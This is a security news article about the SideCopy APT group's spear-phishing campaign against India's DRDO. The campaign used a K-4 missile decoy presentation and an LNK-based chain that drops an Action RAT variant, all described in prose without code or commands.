SideCopy APT Targets India's Premier Defense Research AgencySideCopy APT Used Decoy Documents in Spear-Phishing Attack on DRDO
Security researchers uncovered a Pakistani cyberespionage group employing fresh tactics to target workers at India's Defense Research and Development Organization and steal sensitive military secrets.
The researchers tracked SideCopy APT's use of research material as a decoy to plant info-stealing malware. DRDO uses its network of 52 laboratories across India and a pool of more than 5,000 scientists to develop, test and supply cutting-edge military technologies to the Indian armed forces.
SideCopy APT traditionally uses spear-phishing to gain initial entry. Emails in the latest campaign purportedly contain research material about military technologies sent as attachments.
Cyble said a phishing email sent to a DRDO worker carried a malicious zip attachment that contained a LNK file named
DRDO - K4 Missile Clean room.pptx.lnk. The K-4 is a nuclear-capable submarine-launched ballistic missile developed by DRDO.
This phishing attack differed from other attacks because the zip file contained a PowerPoint file with actual information about the K-4 missile. The infection chain begins with the user extracting the file and running the .lnk file. That downloads an HTML application that opens the slide presentation.
It also begins a concatenation operation involving multiple HTML applications that ultimately results in dropping a variant of the Action Rat Malware whose files are loaded into the operating system with names that mimic essential Windows components.
The malware's capabilities include obtaining or retrieving information about specific files and available drives, installing additional payloads and transmitting files to the command-and-control server.
Cyble researchers told Information Security Media Group that SideCopy APT emulates the tactics of Sidewinder APT, a threat group believed to have Indian roots. "This group has been observed to target government and military officials in India and Afghanistan specifically and continuously evolves its techniques while incorporating new tools into its arsenal," they said.
SideCopy APT previously targeted the Indian Army, the National Cadet Corps of India and the National Council of Educational Research and Training using similar tactics (see: Report: SideCopy APT Used New Tactics in Recent Attacks).
Malwarebytes found in 2021 that the group had targeted Indian Army entities using a decoy PDF file named "Email facility address list of the ERE units: 20 Sept 2021." The threat group used the decoy file “Living the values, a value-narrative to grass-root leadership" when it targeted NCERT.